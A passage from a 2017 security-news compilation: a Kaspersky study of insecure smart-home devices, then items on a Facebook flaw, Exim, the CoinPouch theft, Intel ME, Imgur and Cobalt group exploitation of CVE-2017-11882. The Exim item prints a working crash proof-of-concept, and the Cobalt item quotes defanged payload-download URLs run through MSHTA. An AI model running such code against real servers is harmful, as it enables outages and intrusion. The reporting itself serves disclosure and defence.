Given all that, we decided to take a closer look at the applications for the device. There are three of them – one for iOS and two for Android. The first Android app is for when you manage the device via Bluetooth and are standing nearby, and the other one is for the gateway, which serves as an online door to your iron when you are not at home. The iOS app is for Bluetooth management. Speaking about the security of all applications, it is worth mentioning that the vendor’s code is not obfuscated at all.

When viewing online traffic, we found out that the Android Bluetooth application uses HTTPS, which is a sensible solution. The corresponding app for iOS does not and neither does the gateway app for Android. We decided to test the traffic for the iOS application.
 

Example of phishing attack via the application

Once it is enabled, the application offers the user the chance to register, and then sends the data without encryption via HTTP. This gives us a very simple attack vector based on the interception of traffic between the mobile application and the vendor’s server within the local network.

As already mentioned, the phone also communicates with the iron using BLE. The BLE traffic is also not encrypted. After deeper investigation of the applications, we were able to control the iron by creating specific commands just from looking into what is transmitted between the devices.

So, if you were a hacker, what could you do with all this knowledge? First of all if you would be able to capture the user’s credentials, to pass the authorization stage in an official application and to switch off the iron or set it to ‘safe mode’. It is important to note here that these applications are used for all of the vendor’s smart devices, and there are quite a few. This significantly enlarges the attack surface.

No need to worry if you miss the chance to intercept the authentication data. Given that the data exchange between the app and the device is not encrypted, you would be able to intercept a token transmitted from the server to the application and then create your own commands to the iron.

As a result, within the local network an attacker can perform:

Identity theft (steal personal email address, username, password)
Extortion (take advantage of the ignorance of the user to enable ‘safe mode’ so that the user could not mechanically turn on the iron, and to demand money for disabling ‘safe mode’)
Of course both these vectors are highly unlikely to be extensively performed in the wild, but they are still possible. Just imagine how embarrassing it would be if your private information was compromised, not as a result of an attack by a sophisticated hackers, but because of the poor security of your smart iron.

Smart home hub
The biggest problem with the vast majority of connected devices currently available is that most of them work with your smartphone as a separate, independent device, and are not integrated into a larger smart ecosystem. The problem is partly solved by so called smart hubs – nodes that unite in one place the data exchange between multiple separate smart devices. Although prior art in finding a secure smart hub, conducted by multiple other researchers, leaves little room for hope, we tried anyway and took a fancy smart hub with a touch screen and the ability to work with different IoT-protocols. It is universally compatible, works with ZigBee и ZWave home automation standards, and very easy to handle: according to the manufacturer, it can be set up within three minutes, using the touchscreen.
 

In addition the hub serves as a wireless Wi-Fi router.

Given all the features this multi-purpose device has, being a router, range extender, access point or wireless bridge, we decided to check one of the most common and most dangerous risks related to unauthorized external access to the router. Because, if successful, it would possibly lead to full control of a user’s smart home, including all connected devices.

And, no surprise, our research has shown there is such a possibility.

To check our assumption we created a local network, by connecting a PC, the device and one more router to each other. All network devices received their IP addresses, and we successfully scanned available ports. Our initial research has shown that, by default, there are two opened ports over WAN. The first one, port 80, is one of the most commonly used and assigned to protocol HTTP. It is the port from which a computer sends and receives web client-based communication and messages from a web server, and which is used to send and receive HTML pages or data. If opened, it means that any user can connect to port 80 and thus have access to the user’s device via the HTTP protocol.

The second one, port 22 for contacting SSH (Secure Shell) servers is used for remote control of the device. Attackers can gain access to a device if they obtain or successfully brute force a root password. Usually it’s not an easy task to do. However, in our research we explored another interesting risky thing with the smart hub that makes this much easier.

While analyzing the router, we discovered it might have problems with a very common threat risk – weak password generation. In the router system we found ELF (Executable and Linkable Format) file ‘rname’ with a list of names. By looking at this list and the password displayed on the screen, it became clear that device’s password is generated based on the names from this file and, thus, it doesn’t take long for brute force cracking.

After a hard reset, the source line for passwords remained, with slightly changed symbols. However, the main password base remained the same, and that still leaves a chance to generate a password.

In addition, we found that for device access a root account is constantly used. Thus, offensive users will know the login and a base part of the password, which will significantly facilitate a hacker attack.

In case the device has a public IP address and the ports described above are opened, the router can be available for external access from the internet. Or, in other case, if a provider or an ISP (Internet Service Provider) improperly configures the visibility of neighboring hosts of the local network, these devices will be available to the entire local network within the same ISP.

In all, we weren’t surprised; just like most any other smart hubs on the market, this one provides a really vast attack surface for an intruder. And this surface covers not only the device itself, but the network it works on. And here are the conclusions which the results of our experiment have brought us to.

Conclusions
Based on what we’ve seen while doing this exercise, the vendors of many IoT-devices developing their products assume that:

They won’t be attacked due to limited device functionality and a lack of serious consequences in the case of a successful attack.
The appropriate level of security for an IoT-device is when there is no easy way to communicate with the wider internet and the attacker needs to have access to the local network the device is connected to.
We have to say that these assumptions are reasonable, but only until the moment when a vulnerable router or multifunctional smart hub, like the one described above, appears in the network to which all other devices are connected. From that moment, all the other devices, no matter how severe or trivial their security issues, are exposed to interference. It is easy to imagine a house, apartment or office populated with all these devices simultaneously, and also easy to imagine what a nightmare it would be if someone tried each of described threat vectors.

So in answer to the question we asked ourselves at the beginning of this experiment, we can say that, based on our results at least, it is still hard to find a perfectly secure IoT-device.

On the other hand, no matter which device you purchase, most likely it won’t carry really severe security issues, but again, only until you connect them to a vulnerable router or smart hub.
 

Keeping that and the ongoing high sales holiday season in mind we’d like to share the following advice on how to choose IoT devices:

When choosing what part of your life you’re going to make a little bit smarter, consider the security risks. Think twice if you really need a camera-equipped robo vacuum cleaner or a smart iron, which can potentially spill some of your personal data to an unknown third-party.
Before buying an IoT device, search the internet for news of any vulnerability. The Internet of Things is a very hot topic now, and a lot of researchers are doing a great job of finding security issues in products of this kind: from baby monitors to app controlled rifles. It is likely that the device you are going to purchase has already been examined by security researchers and it is possible to find out whether the issues found in the device have been patched.
It is not always a great idea to buy the most recent products released on the market. Along with the standard bugs you get in new products, recently-launched devices might contain security issues that haven’t yet been discovered by security researchers. The best choice is to buy products that have already experienced several software updates.
To overcome challenges of smart devices’ cybersecurity, Kaspersky Lab has released a beta version of its solution for the ‘smart’ home and the Internet of Things – the Kaspersky IoT Scanner. This free application for the Android platform scans the home Wi-Fi network, informing the user about devices connected to it and their level of security.
When it comes to the vendors of IoT-devices, the advice is simple: collaborate with the security vendors and community when developing new devices and improving old ones.

P.S. 1 out of 8
There was one random device in our research, which showed strong enough security for us at least not to be worried about private data leakage or any other devastating consequences. It was a smart watch. Like most other similar devices, these watches require an app to pair them with the smartphone and use. From that moment, most of data exchange between the device and the smartphone, the app and the vendors’ cloud service are reliably encrypted and, without a really deep dive into encryption protocol features or the vendor’s cloud services it is really hard to do anything malicious with the device.

For the pairing the owner should use the pin code displayed on the clock for successful authorization. The pin is randomly generated and is not transmitted from the clock. After entering the pin code in the app, the phone and clock create the key for encryption, and all subsequent communication is encrypted. Thus, in the case of BLE traffic interception an attacker will have to decrypt it as well. For this, an attacker will need to intercept traffic at the stage of generating the encryption key.

It is apparently impossible to get user data (steps, heart rate etc.) directly from the device. Data synchronization from the clock on the phone is encrypted and, in the same form is sent to the server. Thus, data on the phone is not decrypted, so the encryption algorithm and the key are unknown.
 

From our perspective this is an example of a really responsible approach to the product, because, by default the vendor of this device could also easily limit their security efforts to assuming that no one will try to hack their watches, as, even if successful, nothing serious happens. This is probably true: it is hard to imagine a hacker who would pursue an opportunity to steal information about how many steps you made or how fast your heart beats at any given moment of the day. Nevertheless, the vendor did their best to eliminate even that small possibility. And this is good, because cybersecurity is not all those boring and costly procedures which you have to implement because some hackers found some errors in your products, we think cybersecurity is an important and valuable feature of an IoT-product, just like its usability, design and list of useful functions. We are sure that as soon as IoT-vendors understand this fact clearly, the whole connected ecosystem will become much more secure than it is now.


Facebook Flaw Allowed Removal of Any Photo
27.11.2017 securityweek Social
A researcher says he received a $10,000 bounty from Facebook after finding a critical vulnerability that could have been exploited to delete any photo from the social media network.

In early November, Facebook announced a new feature for posting polls that include images and GIF animations. Iran-based security researcher and web developer Pouya Darabi analyzed the feature shortly after its launch and discovered that it introduced an easy-to-exploit flaw.

When a user created a poll, the request sent to Facebook servers included the identifiers of the image files added to the poll. The expert noticed that users could replace the image ID in the request with the ID of any photo on Facebook and that photo would appear in the poll.

Darabi then discovered that once the creator of the poll deleted the post, the image whose ID was added to the request would also get removed from Facebook.

The vulnerability was reported to Facebook on November 3 and a temporary fix was rolled out the same day. The company deployed a complete patch on November 5.

Darabi said he received a $10,000 bug bounty for his findings. The researcher has published a blog post and a video describing the vulnerability.

This was not the first time Darabi earned a significant bounty from Facebook. Back in 2015, the social media giant awarded him $15,000 for bypassing its cross-site request forgery (CSRF) protection systems. The next year he received another $7,500 for a similar weakness.

These types of vulnerabilities are not uncommon on Facebook. In the past years, researchers reported finding several flaws that could have been exploited to delete comments, videos, and photos from Facebook. The security holes, which in most cases involved replacing the ID of the targeted resource in a request, earned researchers roughly $10,000.

Facebook has paid out millions of dollars to researchers who found vulnerabilities in the social media network since the launch of its bug bounty program in 2011.


Unix mailer Exim is affected by RCE, DoS vulnerabilities. Apply the workaround asap
27.11.2017 securityaffairs Vulnerebility

The Exim Internet mail message transfer agent warned of flaws through the public bug tracker, sys admins have to apply the workaround asap.
Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet, it is the most popular MTA on the Internet.

The Internet mail message transfer agent warned of flaws through the public bug tracker, an unfortunate choice to disclose it because the notice could be ignored.

According to the message published on the bug tracker, when parsing the BDAT data header, Exim scans for the ‘.’ character to signify the end of an e-mail.

“A remote code execution vulnerability has been reported in Exim, with immediate public disclosure (we were given no private notice). A tentative patch exists but has not yet been confirmed.

With immediate effect, please apply this workaround: if you are running Exim 4.88 or newer (4.89 is current, 4.90 is upcoming) then in the main section of your Exim configuration, set:

chunking_advertise_hosts =

That’s an empty value, nothing on the right of the equals. This disables advertising the ESMTP CHUNKING extension, making the BDAT verb unavailable and avoids letting an attacker apply the logic.”

Assigning the empty value to the chunking_advertise_hosts turns off the vulnerable function.

EXIM DOS RCE

The advisory included a proof-of-concept code that cause the Exim crash because the function pointer, receive_getc is not reset.

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<test@localhost>")
r.recvline()
r.sendline("RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
r.send('\n')
r.interactive()
exit()
Below the announcement for CVE-2017-16944 vulnerability affecting the SMTP daemon in Exim 4.88 and 4.89.

“The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a ‘.’ character signifying the end of the content, related to the bdat_getc function.” state the advisory published by the NIST.

Sys admins have to turn off e-mail attachment chunking waiting for an imminent patch.


A Verge specific node wallets hacked, crooks stole $655,000 from CoinPouch XVG Verge wallets
27.11.2017 securityaffairs Hacking

CoinPouch publicly disclosed the hack of a Verge specific node wallets and the theft if $655,000 from its XVG Verge wallets.
A mystery surrounds the recent hack of CoinPouch wallet app, users lost over $655,000 worth of Verge cryptocurrency.

On Tuesday, the maintainers of the CoinPouch multi-currency wallet app published a statement that disclosed a security breach that affected its users who stored Verge currency in their wallets.

The project maintainers claimed the incident affected a Verge node set up with the help of Verge project maintainers to handle Verge transactions for Coin Pouch users.

“Users who held XVG Verge in Coin Pouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected. We have no information or customer reports to suggest that any other coins in CoinPouch were affected by this hack.” reads the announcement.

According to CoinPouch, a user reported having his Verge funds stolen on November 9. The results of the investigation conducted by the company along with the maintainers at the Verge project excluded the incident was caused by a cyber attack.

The Verge development team provided specific settings for CoinPouch’s Verge node that would improve its security, but evidently that modifications were not enough.

Even if the developers applied the changes suggested by the Verge team, a few days later some of its users reported problems with the Verge wallets.

“A few days later, we started getting additional reports from users stating their Verge wallets in Coinpouch were not working correctly. So, we contacted Justin again to investigate the issue.” continues the statement. “During that investigation, it was discovered that most Verge tokens on the Verge Specific Node had been transferred out which prompted us to immediately shut down the Verge Specific Node once we were able to confirm that it was a hack.”

CoinPouch publicly disclosed the hack and filed a complaint with law enforcement, it also hired a forensics lab to conduct further investigation.

“Users who held XVG Verge in CoinPouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected.” reads the Verge statement.”

We have contacted the company that hosted the Verge Specific Node to request the server for forensics analysis.
We have contacted a computer forensics lab to initiate forensics analysis.
We have reported the incident to the proper law enforcement authorities.”
CoinPouch

The good news is that the Verge team has traced the wallet used by the hackers to hijack the funds that was containing over 126 million Verge coins.

The maintainers at the Verge project took the distance from CoinPouch, claiming the company was never listed as a recommended wallet on its website and confirmed that it was removed from the site.

vergecurrency
@vergecurrency
To clarify situation and stop disinformation: It was 3rd party wallet @coinpouchapp that was hacked cos wasn't secured properly on their side. Not Verge blockchain. Independent forensic probe was ordered, as reported by #CoinPouch. Expect further status updates on their channels.

2:11 PM - Nov 23, 2017
37 37 Replies 145 145 Retweets 270 270 likes
Twitter Ads info and privacy
vergecurrency
@vergecurrency
CoinPouch iOS wallet has been removed from our website.#xvg #verge #coinpouch #vergecurrency

6:20 PM - Nov 22, 2017
21 21 Replies 64 64 Retweets 145 145 likes
Twitter Ads info and privacy
“This does not mean Verge was hacked nor does it mean Coinpouch was hacked. At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred.” said the Verge development.

“At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred,” said the company in a statement.


Procesory od Intelu mohou napadnout hackeři

27.11.2017 Novinky/Bezpečnost Hacking
Ovládnout cizí počítače na dálku mohou hackeři kvůli nově objevené chybě v procesorech Intel. Ta je hodnocena bezpečnostními experty jako velmi závažná. Upozornil na to český Národní bezpečnostní tým CSIRT.CZ.

„Společnost Intel vydala bezpečnostní doporučení ke zranitelnostem firmwaru produktů Management Engine (Intel ME) ve verzi 11.0/11.5/11.6/11.7/11.10/11.20, Server Platform Services (SPS) verze 4.0 a Trusted Execution Engine (Intel TXE) verze 3.0,“ sdělil Novinkám Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň zdůraznil, že všechny tyto produkty obsahují bezpečnostní zranitelnosti firmwaru, které mohou být v krajním případě útočníkem zneužity k převzetí kontroly nad systémem. Na dálku si tak počítačoví piráti mohou s napadeným strojem dělat, co se jim zlíbí. Klidně i odcizit uživatelská data, nebo majitele sestav šmírovat při práci na PC.

V ohrožení jsou firmy i jednotlivci, neboť zmiňované nástroje jsou nedílnou součástí drtivé většiny moderních procesorů Intel. Riziko se tedy týká nejen firem, ale také jednotlivých uživatelů.

Záplaty jsou již na světě
Intel začal problém okamžitě řešit. „V reakci na problémy identifikované externími výzkumníky prověřila společnost Intel důkladně všechny své technologie. Bohužel jsme skutečně objevili slabé stránky zabezpečení, které by mohly ohrozit některé platformy,“ uvedli v prohlášení zástupci společnosti Intel.

Dále čipový gigant zveřejnil procesorové řady, kterých se problémy týkají. Jejich přehled naleznete v tabulce na konci článku.

Opravy vydal samotný Intel. Například společnosti Lenovo, Dell a HP nicméně informovaly, že záplaty nabízejí pro své zákazníky také prostřednictvím vlastních webových stránek. Majitelé dotčených platforem by tak neměli v žádném případě otálet a měli by co nejrychleji nainstalovat všechny aktualizace pro své počítače.

„Administrátorům systémů se doporučuje aktualizovat pomocí dostupné záplaty,“ uzavřel Bašta.

Jaké systémy jsou zranitelné
6., 7. a 8. generace rodiny procesorů Intel Core
Produktová řada procesorů Intel Xeon E3-1200 v5 a v6
Procesorová řada Intel Xeon Scalable
Procesor Intel Xeon řady W
Rodina procesorů Intel Atom C3000
Apollo Lake procesor Intel Atom řady E3900
Apollo Lake Intel Pentium
Procesory řady Celeron N a J


Imgur Discloses 2014 Breach Affecting 1.7 Million Users
27.11.2017 securityweek Incindent

Popular image hosting website Imgur notified users on Friday that hackers had stolen data associated with 1.7 million accounts as a result of a breach that occurred back in 2014.

The company learned about the hack from Australian security expert Troy Hunt, operator of the Have I Been Pwned breach notification service, and immediately began taking steps to address the situation.

“I want to recognise Imgur’s exemplary handling of this: that's 25 hours and 10 mins from my initial email to a press address to them mobilising people over Thanksgiving, assessing the data, beginning password resets and making a public disclosure,” Hunt said.

Others also praised the company for the way it handled the incident, with many comparing it to Uber, which attempted to cover up a massive 2016 breach that hit more than 57 million users.

Only email addresses and passwords were apparently compromised in the Imgur breach and the company says it does not ask users to provide any other data, such as real names, addresses or phone numbers.

At the time of the hack, the passwords had been stored as hashes generated using the SHA-256 algorithm, which can be cracked. The MD5Decrypt service, for example, can reveal the plaintext password from an SHA-256 hash if it’s one of the 3.7 billion strings stored in its database. Imgur said it switched to the more secure bcrypt algorithm sometime last year.

Imgur is among the world’s largest 50 websites, with more than 150 million active users every month. In 2014, when the breach occurred, the site had roughly 130 million active monthly users. Some news articles describe these figures as “unique visitors,” which suggests that not all of these users have registered an account, especially since an account is not needed to view images posted on the website.

Nevertheless, it’s possible that the actual number of compromised accounts is much higher than 1.7 million. Hunt pointed out that the data he came across only appears to include passwords that were cracked. “I don’t know how much more data may have been originally obtained,” the expert said.

Hunt also noted that 60% of the compromised accounts had already been exposed in previous breaches tracked by Have I Been Pwned.

Imgur has notified affected users and is requiring them to change their passwords. The company’s investigation into this incident is ongoing.

“We take protection of your information very seriously and will be conducting an internal security review of our system and processes,” said Roy Sehgal, Chief Operating Officer of Imgur.


The Cobalt group is exploiting the CVE-2017-11882 Microsoft Office flaw in targeted attacks
27.11.2017 securityaffairs Vulnerebility

A few days after details about the CVE-2017-11882 Microsoft Office flaw were publicly disclosed, the firm Reversing Lab observed Cobalt group using it.
A few days after details about the CVE-2017-11882 Microsoft Office vulnerability were publicly disclosed, security experts from firm Reversing Lab observed criminal gang using it in the wild.

The gang is the notorious Cobalt hacking group that across the years targeted banks and financial institutions worldwide.

The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Cobalt group

The CVE-2017-11882 flaw was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and affects Microsoft Office 2007 and later because the component was maintained to maintain the backward compatibility.

According to Reversing Labs, the Cobalt group is now targeting organizations with malicious email using specifically crafted RTF documents that trigger the CVE-2017-11882 flaw.

The availability online of many exploits of the of CVE-2017-11882 will allows threat actors to rapidly use the hacking code in their operations.
Valthek
@ValthekOn
My POC of CVE-2017-11882 Exploit using only 108 bytes and without size limit later, :)https://29wspy.ru/reversing/CVE-2017-11882.pdf …@hasherezade @Farenain @malwrhunterteam @malwareunicorn @51ddh4r7h4 @struppigel @Malwarebytes #Malware @demonslay335 @fwosar @BleepinComputer

12:40 PM - Nov 23, 2017
3 3 Replies 118 118 Retweets 140 140 likes
Twitter Ads info and privacy
Other proof of concept (PoC) exploits are available online:

https://github.com/embedi/CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882
https://github.com/unamer/CVE-2017-11882
The infection chain would go through multiple steps, in the final stage the malware would download and load a malicious DLL file.

“The starting point of our analysis was an RTF seen in the wild:
bc4d2d914f7f0044f085b086ffda0cf2eb01287d0c0653665ceb1ddbc2fd3326

Using MS Equation CVE-2017-11882, it contacted
hxxp://104.254.99[.]77/x.txt
for first-stage payload, executed through MSHTA” reads the analysis published by ReversingLabs.

“When run, it downloads the next stage payload from
hxxp://104.254.99[.]77/out.ps1″

The script drops the embedded final second-stage payload – Cobalt, one 32-bit or second 64-bit DLL, depending on the system architecture:
d8e1403446ac131ac3b62ce10a3ee93e385481968f21658779e084545042840f (32-bit)
fb97a028760cf5cee976f9ba516891cbe784d89c07a6f110a4552fc7dbfce5f4 (64-bit)

The analysis published by the security firm includes IoCs and also Yara rules to detect the threat.

The Cobalt group has already exploited Microsoft bugs in past campaigns, for example the RCE vulnerability tracked as CVE-2017-8759 that was fixed by Microsoft in the September 2017 Patch Tuesday.

The Cobalt group was first spotted in 2016 when it was spotted targeting ATMs and financial institutions across Europe, later it targeted organizations in the Americas and Russia.

To protect their systems, administrators should apply the Windows updates KB2553204, KB3162047, KB4011276, and KB4011262, included in the November 2017 Patch Tuesday.